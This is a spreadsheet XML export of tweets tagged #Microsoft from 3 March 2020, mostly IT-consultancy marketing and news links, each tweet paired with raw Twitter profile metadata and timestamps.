    <t>{'id': 449915777, 'id_str': '449915777', 'name': 'Agora Tech', 'screen_name': 'AgoraTech_eu', 'location': 'Bergamo', 'description': 'Agora Tech fornisce servizi informatici, consulenza nel mondo digitale e tecnologico', 'url': 'https://t.co/2UEtLfSmh3', 'entities': {'url': {'urls': [{'url': 'https://t.co/2UEtLfSmh3', 'expanded_url': 'http://www.agoratech.eu', 'display_url': 'agoratech.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 217, 'friends_count': 443, 'listed_count': 3, 'created_at': 'Thu Dec 29 17:07:20 +0000 2011', 'favourites_count': 16781, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 261,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'http://pbs.twimg.com/profile_images/833711301205585920/Po8zjOzA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/833711301205585920/Po8zjOzA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/449915777/1496054248',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</si>
  <si>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16:09:01 +0000 2020</t>
  </si>
  <si>
    <t>How do you safeguard your data? Protect against the increasing threat of ransomware attacks without breaking the bank. #Microsoft #Azure secures your data from exploitation with built-in protections. https://t.co/jkajdc41ch</t>
  </si>
  <si>
    <t>Tue Mar 03 16:08:25 +0000 2020</t>
  </si>
  <si>
    <t>#CRM platforms like #Microsoft #Dynamics are becoming a normal part of the #financialservices industry. Find out why:  https://t.co/WHTAqX7xQP</t>
  </si>
  <si>
    <t>{'id': 1136050027, 'id_str': '1136050027', 'name': 'IES', 'screen_name': 'IESCRM', 'location': 'South Florida', 'description': 'IES is a #Microsoft Dynamics Gold Certified Partner.  We specialize in #CRM, #GP, #ERP, and #NAV. We offer #Microsoftdynamics consulting services in #Florida.', 'url': 'http://t.co/CVWCTHLzbn', 'entities': {'url': {'urls': [{'url': 'http://t.co/CVWCTHLzbn', 'expanded_url': 'http://www.iesgp.com', 'display_url': 'iesgp.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7754, 'friends_count': 3753, 'listed_count': 195, 'created_at': 'Thu Jan 31 04:51:27 +0000 2013', 'favourites_count': 91, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3103,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'http://pbs.twimg.com/profile_images/634389192986882048/FWQ3FG9C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/634389192986882048/FWQ3FG9C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1136050027/1413314203', 'profile_link_color': '007FC8',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</si>
  <si>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16:08:09 +0000 2020</t>
  </si>
  <si>
    <t>#warning #Microsoft #Windows 10
Warning Issued For Millions Of Microsoft Windows 10 Users via @forbes https://t.co/g1wKg8fEWn</t>
  </si>
  <si>
    <t>{'id': 1493516077, 'id_str': '1493516077', 'name': 'Josef Riegebauer', 'screen_name': 'JosefRiegebauer', 'location': 'Graz, Austria', 'description': 'tweets privately - #technology, #renewable #resources, #blockchain, #investing, #sustainable ideas/thoughts, for the interest of #Humanity, #Democracy &amp; #Earth', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 205, 'friends_count': 1040, 'listed_count': 1, 'created_at': 'Sat Jun 08 17:41:56 +0000 2013', 'favourites_count': 160, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3895,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'http://pbs.twimg.com/profile_images/1133370162202259456/k2v6xO95_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133370162202259456/k2v6xO95_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1493516077/1401360706',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</si>
  <si>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16:07:41 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/7DXmRFURJf</t>
  </si>
  <si>
    <t>Tue Mar 03 16:07:09 +0000 2020</t>
  </si>
  <si>
    <t>How a connected #Microsoft #Azure ecosystem helps Ignition Ai compete with blazing-fast real-time analytics and built-in #security. https://t.co/rciTPmOBe0</t>
  </si>
  <si>
    <t>Tue Mar 03 16:07:08 +0000 2020</t>
  </si>
  <si>
    <t>How a connected #Microsoft #Azure ecosystem helps Ignition Ai compete with blazing-fast real-time analytics and built-in #security. https://t.co/gvsti5HDkW</t>
  </si>
  <si>
    <t>Tue Mar 03 16:06:53 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365 #AdvancedThreatProtection, General Technique offers an email filtering service that delivers stronger protection against specific types of advanced threats. https://t.co/RABQwIKD9L</t>
  </si>
  <si>
    <t>{'id': 703788186, 'id_str': '703788186', 'name': 'General Technique', 'screen_name': 'genltech', 'location': 'Redlands, CA', 'description': 'Full Service Computer Service and Repair Center and Business Solution Provider', 'url': 'http://t.co/PYDD8NIijJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/PYDD8NIijJ', 'expanded_url': 'http://www.generaltechnique.com', 'display_url': 'generaltechnique.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 22, 'listed_count': 1, 'created_at': 'Wed Jul 18 21:04:39 +0000 2012', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1027,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'http://pbs.twimg.com/profile_images/775769307485642754/mKWnp2jy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/775769307485642754/mKWnp2jy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/703788186/1429810415',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</si>
  <si>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16:06:32 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft recently announced that its role-based certificates will replace existing #Microsoft Certified Solutions Associate, Microsoft Certified Solutions Developer, and Microsoft Certified Solutions Expert certificates in June.
 https://t.co/lmyxbYwf0I
#CDNTech</t>
  </si>
  <si>
    <t>Tue Mar 03 16:06:12 +0000 2020</t>
  </si>
  <si>
    <t>Despite being announced 3 years ago, the momentum behind #AzureStack continues to grow. @Darmour_MSFT talks about the foundations of its success. 
#HPEalliances #Microsoft #AzureStackHub #HybridCloud https://t.co/ofAi6zWMx9</t>
  </si>
  <si>
    <t>Tue Mar 03 16:05:40 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/8TC4xr1giW</t>
  </si>
  <si>
    <t>Tue Mar 03 16:05:19 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN deployment guide for @KempTech load balancers is now available. #Windows10 #Win10 #Microsoft #mobility #aovpn https://t.co/WvCjij7zZe</t>
  </si>
  <si>
    <t>Tue Mar 03 16:05:13 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/5qjc37U3jj</t>
  </si>
  <si>
    <t>{'id': 4579372759, 'id_str': '4579372759', 'name': 'Constellation Solutions', 'screen_name': 'spconstellation', 'location': 'Austin, TX', 'description': 'Office 365,SharePoint, and Azure expert consulting and solutions.', 'url': 'https://t.co/kVLnic4qcx', 'entities': {'url': {'urls': [{'url': 'https://t.co/kVLnic4qcx', 'expanded_url': 'http://www.constellationsolutions.com', 'display_url': 'constellationsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 100, 'friends_count': 213, 'listed_count': 32, 'created_at': 'Wed Dec 16 23:30:16 +0000 2015', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 691, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/818158245046910976/TE5AgGLs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/818158245046910976/TE5AgGLs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4579372759/1485382505',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</si>
  <si>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16:05:06 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/o3dfwx3BP6</t>
  </si>
  <si>
    <t>Tue Mar 03 16:04:47 +0000 2020</t>
  </si>
  <si>
    <t>Secure and seamless business continuity is possible! Nakilat improved efficiency and cut operating costs in half with #Microsoft SaaS solutions. Contact  to learn how you can too. https://t.co/IzHMAjHrLi</t>
  </si>
  <si>
    <t>{'id': 55426830, 'id_str': '55426830', 'name': 'CoeSolutions', 'screen_name': 'coesolutions', 'location': 'New Orleans NOLA ', 'description': 'Making the south a better and more secure place...one computer network and accounting department at a time', 'url': 'http://t.co/PTN8Rti2QH', 'entities': {'url': {'urls': [{'url': 'http://t.co/PTN8Rti2QH', 'expanded_url': 'http://www.coesolutions.com', 'display_url': 'coesolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 390, 'friends_count': 551, 'listed_count': 53, 'created_at': 'Fri Jul 10 01:23:40 +0000 2009', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5384,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'http://pbs.twimg.com/profile_images/463724980736241664/F-JWhueP_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/463724980736241664/F-JWhueP_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/55426830/1399395584',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</si>
  <si>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16:04:26 +0000 2020</t>
  </si>
  <si>
    <t>More than 30% of businesses use advanced communication tools in conference rooms. Want to find the #teamworksolution that's right for your business? Check out this infographic to see the latest #Microsoft solutions available to your team. https://t.co/fMbNU1By5f</t>
  </si>
  <si>
    <t>Tue Mar 03 16:04:13 +0000 2020</t>
  </si>
  <si>
    <t>Fashion e-retailer Stitch Fix is the algorithm queen, taking #datascience to new heights. With #Microsoft #PowerBI and #Azure, AGJ Systems and Networks can help you bring powerful #AI insights into your company. https://t.co/YMaG3tExnS</t>
  </si>
  <si>
    <t>{'id': 47785221, 'id_str': '47785221', 'name': 'agj systems', 'screen_name': 'agjsystems', 'location': 'Mississippi Gulf Coast', 'description': 'A Service Disabled Veteran Owned Small Business &amp; leading IT consulting firm on the Mississippi Gulf Coast. Join us for IT Tips, Tech Knowledge &amp; a bit of humor', 'url': 'http://t.co/v9rbJnhjMr', 'entities': {'url': {'urls': [{'url': 'http://t.co/v9rbJnhjMr', 'expanded_url': 'http://agjsystems.com/', 'display_url': 'agjsystems.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 229, 'listed_count': 6, 'created_at': 'Wed Jun 17 00:08:54 +0000 2009', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1833, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '454644', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/269240520/agj-logo-converted_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/269240520/agj-logo-converted_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47785221/1554910272', 'profile_link_color': '4D6B08', 'profile_sidebar_border_color': '363735', 'profile_sidebar_fill_color': 'A2C44D', 'profile_text_color': '363735', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 16:03:57 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Deploying Citrix Virtual Apps and Desktops in AWS Nitro-based regions: " https://t.co/3XJF6zpSVL
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Tue Mar 03 16:02:42 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams adoption is soaring amidst the #coronavirus outbreak. 
To keep up with productivity when isolation is happening globally, many are turning to collaboration software like Teams: https://t.co/lCNmvObfu6
#Microsoft #MicrosoftTeams #agileworkplace #COVID19 https://t.co/8crGdLt2Gw</t>
  </si>
  <si>
    <t>{'id': 54313681, 'id_str': '54313681', 'name': 'Envision Technology Advisors, LLC', 'screen_name': 'envisiontech', 'location': 'Providence, RI', 'description': 'IT consulting services for NE &amp; beyond - #cybersecurity, #digitaltransformation, #virtualization, #cloud solutions, #network consulting, #webdesign and more.', 'url': 'http://t.co/S4FeZls1k6', 'entities': {'url': {'urls': [{'url': 'http://t.co/S4FeZls1k6', 'expanded_url': 'http://www.envisionsuccess.net', 'display_url': 'envisionsuccess.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3101, 'friends_count': 2633, 'listed_count': 56, 'created_at': 'Mon Jul 06 19:58:07 +0000 2009', 'favourites_count': 805, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1365, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A0BDCE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1088117312694022145/x1iJAZVM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088117312694022145/x1iJAZVM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54313681/1581442424', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': 'A7BFCC', 'profile_sidebar_fill_color': 'DCEEF7', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 16:00:45 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft just canceled two conferences ahead of their major ones https://t.co/z3hwtrEPNq #Google #Microsoft #Market https://t.co/yYLGe55HB4</t>
  </si>
  <si>
    <t>Tue Mar 03 16:00:44 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone https://t.co/XvkKmUux59 #Azure #Microsoft #Networking</t>
  </si>
  <si>
    <t>Tue Mar 03 16:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Want to migrate Active Directory users (including passwords), groups, contacts, distribution lists and OUs between two domains, without a domain trust? Check out the video tutorial now! https://t.co/FxS8ApNw50 #ActiveDirectory #Microsoft #Windows #WindowsServer #NetworkAdmin #it https://t.co/gAprluDiIw</t>
  </si>
  <si>
    <t>Tue Mar 03 16:00:18 +0000 2020</t>
  </si>
  <si>
    <t>Today Jean-Philippe Courtois, Microsofts Worldwide Marketing EVP, visited London to meet with our 12 Digital Cohort members. 
The roundtable session discussed how organisations can measure their impact on society using AI.
#Microsoft #AIForGood #AI https://t.co/724m45W5tM https://t.co/yPMtm4QCUs</t>
  </si>
  <si>
    <t>{'id': 4386054689, 'id_str': '4386054689', 'name': 'BeneTalk', 'screen_name': 'teambenetalk', 'location': 'London, England', 'description': 'Wearable tech for people who stutter. BeneTalk monitors breathing and speech in real time to reduce struggle, unlock potential and stimulate research.', 'url': 'https://t.co/XFh1IibLRp', 'entities': {'url': {'urls': [{'url': 'https://t.co/XFh1IibLRp', 'expanded_url': 'http://www.benetalk.com', 'display_url': 'benetalk.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 153, 'friends_count': 238, 'listed_count': 8, 'created_at': 'Sat Dec 05 19:20:12 +0000 2015', 'favourites_count': 237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 356,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'http://pbs.twimg.com/profile_images/1202261688042565633/ROhYYzri_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202261688042565633/ROhYYzri_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4386054689/1575475965',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</si>
  <si>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16:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Anyone have any things to look out for when deploying Microsoft Business Voice? #Microsoft #MicrosoftTeams #voip</t>
  </si>
  <si>
    <t>{'id': 44871312, 'id_str': '44871312', 'name': 'Ross McCabe', 'screen_name': 'Ross_mccabe', 'location': 'Watford', 'description': 'Please follow http://t.co/5PcYxsDvDz', 'url': 'http://t.co/McCAY7FRIO', 'entities': {'url': {'urls': [{'url': 'http://t.co/McCAY7FRIO', 'expanded_url': 'http://www.football-betting-tips.net', 'display_url': 'football-betting-tips.net', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/5PcYxsDvDz', 'expanded_url': 'http://www.facebook.com/footballbettingtips.net', 'display_url': 'facebook.com/footballbettinâ€¦', 'indices': [14, 36]}]}}, 'protected': False, 'followers_count': 140, 'friends_count': 141, 'listed_count': 1, 'created_at': 'Fri Jun 05 11:22:33 +0000 2009', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6379,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'http://pbs.twimg.com/profile_images/250969722/DSCF0089_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/250969722/DSCF0089_normal.JPG',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</si>
  <si>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16:00:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is happy to announce a private preview of Universal Print #Microsoft #technology https://t.co/CqknWCnvaa #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 15:58:58 +0000 2020</t>
  </si>
  <si>
    <t>PowerShell: Create #AzureIoTHub
 #AzurePowerShell #Azure #Microsoft #AzureFamily
https://t.co/2FBLZX2ci3</t>
  </si>
  <si>
    <t>Tue Mar 03 15:58:40 +0000 2020</t>
  </si>
  <si>
    <t>Bruh dis not news bruh
https://t.co/DUdkgmsioS
Drop a comment on the vid for a chance to win a copy of Animal Crossing New Horizons!
#nintendo #sony #Microsoft #giveaway https://t.co/VoRfxmCnGt</t>
  </si>
  <si>
    <t>{'id': 2860782496, 'id_str': '2860782496', 'name': 'FUgameCrue', 'screen_name': 'FUgameCrue', 'location': 'Nashville, TN', 'description': "Just some boys who fiddle with vidjya games. Our moms said we could cuss so if you're cool then check our channel out", 'url': 'https://t.co/2mMRCH6zbI', 'entities': {'url': {'urls': [{'url': 'https://t.co/2mMRCH6zbI', 'expanded_url': 'http://youtube.com/fugamecrue', 'display_url': 'youtube.com/fugamecrue', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19557, 'friends_count': 12357, 'listed_count': 40, 'created_at': 'Tue Nov 04 14:26:53 +0000 2014', 'favourites_count': 9083, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6135,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'http://pbs.twimg.com/profile_images/1225494481601998850/azxx8V-A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225494481601998850/azxx8V-A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2860782496/1581015409',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</si>
  <si>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15:57:14 +0000 2020</t>
  </si>
  <si>
    <t>We need a LetMeSPSearchThatForYou App... #SPOnline #SharePointOnline #Microsoft365 #Office365 #MicrosoftTeams #Microsoft https://t.co/V97wuVVNG3</t>
  </si>
  <si>
    <t>{'id': 825372553225060352, 'id_str': '825372553225060352', 'name': 'Hunter Willis', 'screen_name': 'HW_EndUser', 'location': 'Richmond, VA', 'description': 'Product Marketing Manager @AvePoint_Inc | Volunteer IT admin | President, @RichmondSUG | MCSA O365 | Service Adoption Specialist | History Nut | Happy Dad |', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 400, 'friends_count': 659, 'listed_count': 6, 'created_at': 'Sat Jan 28 15:58:46 +0000 2017', 'favourites_count': 5187, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2579,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'http://pbs.twimg.com/profile_images/1227997759468384256/yAbWN0q4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227997759468384256/yAbWN0q4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/825372553225060352/1558723182',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</si>
  <si>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15:55:06 +0000 2020</t>
  </si>
  <si>
    <t>.#DirectionsNA is the premier place to learn what #Microsoft has in store for #MSD365BC and what is happening in the marketplace, says AJ Ansari, Dynamics Southwest. Learn more about why AJ is looking forward to at Directions 2020. https://t.co/0aQpZnsFut https://t.co/kRfSalYaiG</t>
  </si>
  <si>
    <t>{'id': 124537999, 'id_str': '124537999', 'name': 'Directions NA', 'screen_name': 'DirectionsNA', 'location': 'Las Vegas, NV', 'description': 'The only Microsoft Partner conference in North America where you can learn about #MSDyn365BC and #MSDynNAV.', 'url': 'https://t.co/CI79qKmhOM', 'entities': {'url': {'urls': [{'url': 'https://t.co/CI79qKmhOM', 'expanded_url': 'http://www.directionsna.com', 'display_url': 'directionsna.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2033, 'friends_count': 456, 'listed_count': 56, 'created_at': 'Fri Mar 19 18:41:43 +0000 2010', 'favourites_count': 240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2650,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'http://pbs.twimg.com/profile_images/1202608583537569797/pppE-KC3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1202608583537569797/pppE-KC3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/124537999/1575476795', 'profile_link_color': '006EDB', 'profile_sidebar_border_color': '006EDB', 'profile_sidebar_fill_color': 'FFD792', 'profile_text_color': '222222', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>@BillGates says the coronavirus is a pandemic and a 'once-in-a-century pathogen.' Here are the solutions he's proposing to fight it. #BillGates #Coronavirus #Science #Health #Pandemic #Tech #Microsoft #STEM via @YahooNews https://t.co/2fTntPxZZe</t>
  </si>
  <si>
    <t>Tue Mar 03 15:53:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will soon add RPA to Power Automation platform https://t.co/Ro4WwEvENJ #AI #Trends #Microsoft #PowerAutomation #RPA @techzineeu https://t.co/Om2xgYp9Q9</t>
  </si>
  <si>
    <t>{'id': 1168954887826227207, 'id_str': '1168954887826227207', 'name': 'Techzine Europe', 'screen_name': 'techzineeu', 'location': 'Netherlands', 'description': 'âœˆï¸ #Techzine covers the world of #technology\nðŸ•µï¸\u200dâ™‚ï¸ #IT #Cloud #Security #Data #Devops\nðŸ”Research &amp; analyse #enterprise solutions\nâ­ Learn more: https://t.co/8HYw418ykF', 'url': 'https://t.co/gpnZhD2ouq', 'entities': {'url': {'urls': [{'url': 'https://t.co/gpnZhD2ouq', 'expanded_url': 'https://www.techzine.eu', 'display_url': 'techzine.eu', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/8HYw418ykF', 'expanded_url': 'http://www.techzine.eu', 'display_url': 'techzine.eu', 'indices': [142, 165]}]}}, 'protected': False, 'followers_count': 1891, 'friends_count': 693, 'listed_count': 5, 'created_at': 'Tue Sep 03 18:32:29 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 821, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168956693948096513/nl1asOnw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168956693948096513/nl1asOnw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1168954887826227207/1571049196',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</si>
  <si>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15:50:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is cancelling the 2020 MVP summit due to concerns over the coronavirus. https://t.co/O9Hw3ZvKXZ</t>
  </si>
  <si>
    <t>Tue Mar 03 15:49:34 +0000 2020</t>
  </si>
  <si>
    <t>@tim_cook @satyanadella Its an abomination that global brands like #Apple and #Microsoft could be using essentially #Uighur slave labour. Disgraceful!</t>
  </si>
  <si>
    <t>{'id': 258093200, 'id_str': '258093200', 'name': 'Steve', 'screen_name': 'shusseina', 'location': 'New Zealand', 'description': 'Can program - have bills, need to eat. #Programmer looking for that next great opportunity | #Muslim #Submitter - learn more https://t.co/gjRGVlrV6y', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/gjRGVlrV6y', 'expanded_url': 'http://www.masjidtucson.org', 'display_url': 'masjidtucson.org', 'indices': [125, 148]}]}}, 'protected': False, 'followers_count': 73, 'friends_count': 184, 'listed_count': 51, 'created_at': 'Sat Feb 26 23:25:15 +0000 2011', 'favourites_count': 2296, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4159,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'http://pbs.twimg.com/profile_images/755281486043947008/9oI_M8xq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/755281486043947008/9oI_M8xq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/258093200/1400318645',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</si>
  <si>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15:49:29 +0000 2020</t>
  </si>
  <si>
    <t>I'm no longer a day-to-day #redteam operator but often revisit the basics. This #kerberos overview by @HackAndDo is by far the most succinct and accessible explanation of the technology I've ever read! #activedirectory #microsoft #windows https://t.co/9Nax1Xs8sT</t>
  </si>
  <si>
    <t>{'id': 1914580765, 'id_str': '1914580765', 'name': '\U0001f9c3', 'screen_name': 'j00c3', 'location': 'DC', 'description': 'Army vet. Forever infosec n00b. Red team manager and operator. Former CEH &amp; Sec+ ðŸ˜±', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 67, 'friends_count': 134, 'listed_count': 9, 'created_at': 'Sat Sep 28 16:00:29 +0000 2013', 'favourites_count': 366, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/647895693470908417/_yKqBJBf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/647895693470908417/_yKqBJBf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1914580765/1401424224', 'profile_link_color': '00D000',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</si>
  <si>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15:47:39 +0000 2020</t>
  </si>
  <si>
    <t>At least the Coronavirus cant be transmitted digitally, as the epicenter for US is in Kirkland WA #Microsoft #Google #Facebook https://t.co/yH22REUPOX</t>
  </si>
  <si>
    <t>{'id': 76470015, 'id_str': '76470015', 'name': 'Chrystal Tapp', 'screen_name': 'chrystt', 'location': 'Florida, USA', 'description': 'IT strategist and story writer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 61, 'listed_count': 0, 'created_at': 'Tue Sep 22 22:21:08 +0000 2009', 'favourites_count': 221, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 61,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'http://pbs.twimg.com/profile_images/1230106526054068224/_3Ss3FAO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230106526054068224/_3Ss3FAO_normal.jpg', 'profile_link_color': 'FF0000', 'profile_sidebar_border_color': 'F2E195', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 15:46:35 +0000 2020</t>
  </si>
  <si>
    <t>Interesting read from Jim Little on the Six habits of digital transformation leaders. 
#EY #Microsoft #digital #transformativeage #technology https://t.co/ljxjAnjhRa</t>
  </si>
  <si>
    <t>{'id': 120049305, 'id_str': '120049305', 'name': 'Erin Otten', 'screen_name': 'ErinOtten', 'location': '', 'description': 'Informatiestrateeg | (smart)datafetisjist | gelegenheidsfilosoof | Rotterdammer | muziek&amp;audio | rugby&amp;crossfit | wetenschap | innovatie', 'url': 'https://t.co/580ajcXyls', 'entities': {'url': {'urls': [{'url': 'https://t.co/580ajcXyls', 'expanded_url': 'http://www.erinotten.nl', 'display_url': 'erinotten.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 366, 'friends_count': 588, 'listed_count': 72, 'created_at': 'Fri Mar 05 09:42:01 +0000 2010', 'favourites_count': 1180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1191,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'http://pbs.twimg.com/profile_images/869933029610971137/tresLXfr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/869933029610971137/tresLXfr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/120049305/1421404207',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</si>
  <si>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15:46:01 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Sugar baby here hmu #Topeka   #blond #microsoft https://t.co/1lJVZJhp1o</t>
  </si>
  <si>
